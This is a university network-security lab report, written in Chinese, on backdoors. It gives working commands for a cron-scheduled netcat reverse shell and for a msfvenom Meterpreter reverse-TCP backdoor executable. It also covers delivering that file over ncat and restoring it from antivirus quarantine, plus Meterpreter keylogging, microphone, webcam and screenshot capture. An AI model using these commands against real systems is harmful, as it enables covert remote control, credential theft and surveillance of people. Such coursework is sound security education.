2019-2020-2 20175307高士淳《网络对抗技术》Exp2 后门原理与实践

一、实验内容目录

任务一：使用netcat获取主机操作Shell，cron启动
任务二：使用socat获取主机操作Shell, 任务计划启动
任务三：使用MSF meterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell
任务四：使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

二、NC学习

NC或netcat，在网络工具中有“瑞士军刀”美誉。
小巧精悍，下面是我对NC学习的内容。

1.指令学习

-d 后台执行
-e prog 程序重定向
-g gateway 源路由跳数，最大值为8
-h 帮助信息
-i secs 延时的间隔
-l 监听模式
-n 指定IP地址
-o file 记录16进制的传输
-p 端口

2.实践

（1）Windows获得Linux Shell
1.win监听5307端口

2.kali反弹连接

3.win获得shell

（2）Linux获得Win Shell
1.Kali监听5307端口
2.win反弹连接

3.Kali获得shell

（3）nc传输数据
1、 Windows下监听5205端口
2、 Kali下连接到Windows的5205端口
3、 建立连接之后，就可以传输数据了

三、Meterpreter

Meterpreter是Metasploit框架中的一个扩展模块，作为溢出成功以后的攻击载荷使用。

任务一：使用netcat获取主机操作Shell，cron启动

Cron是Linux下的定时任务，每一分钟运行一次，根据配置文件执行预设的指令。
这是cron运行命令的格式

#m h  dom mon dow   command

根据这个格式，我们将每小时的第8分钟运行反弹连接win的命令

05 * * * * /bin/netcat 192.168.0.105 5307 -e /bin/sh

下面是录屏gif

任务二：使用socat获取主机操作Shell, 任务计划启动

socat是ncat的增强版，它使用的格式是socat [options]

，其中两个address是必选项，而options 是可选项。

1. 在“任务计划程序”中“创建任务”
   

2.填写任务名称，并新建一个触发器

3.新建操作，端口设置为5307

4.创建完成之后，按Windows+L快捷键锁定计算机，再次打开时，可以发现之前创建的任务已经开始运行

5.在Kali环境下输入指令socat - tcp:192.168.62.1:5307
这样就获得了一个Shell
执行的命令是ipconfig查看ip，但是因为乱码，看的不是很清楚

任务三：使用MSF meterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell

1.在Kali上执行指令生成后门文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.132 LPORT=5307-f exe > 20175307_backdoor.exe

Lhost是Kali的IP地址，Lport为端口

2.通过ncat进行传输
（1）Win10 cmd键入

ncat.exe -l 5307 >20175307_backdoor.exe

准备接收文件

（2）Kali键入

nc 192.168.0.105 5307 < 20175307_backdoor.exe 

传输文件

结果被360查杀了

（3）360恢复后门文件

3.msf控制台，设置监听

4.运行后门文件，kali获得shell

任务四：使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容

1.录音

record_mic 

加上-d 5表示录音5秒

2. 使用摄像头

webcam_snap

指令可以使用摄像头进行拍照。
但是Win7虚拟机没摄像头，所以失败了

3. 使用

keyscan_start

指令开始记录下击键的过程，使用

keyscan_dump

指令读取击键的记录

keyscan_stop

表示停止记录键盘

4. 使用

screenshot

指令可以进行截屏

四、基础问题回答

1.例举你能想到的一个后门进入到你系统中的可能方式？

在某些下载网站下载破解版软件的时候，会要求先下载一个专用下载器，并要求添加信任，这个时候点击下载器，可能会执行绑定的后门文件。
本人玩游戏，打不过会通过某些同学要到外挂，比如单板透视，本身是一个壳，会要求360添加信任，在执行外挂的同时，极有可能就执行了后门文件。

(2)例举你知道的后门如何启动起来(win及linux)的方式？

自动项，修改注册表，crontab，任务计划程序

(3)Meterpreter有哪些给你映像深刻的功能？

主机植入后门之后，可以控制主机，通过键盘记录可以轻松获取账户和密码。

(4)如何发现自己有系统有没有被安装后门？

查看注册表，启动项，杀毒软件，防火墙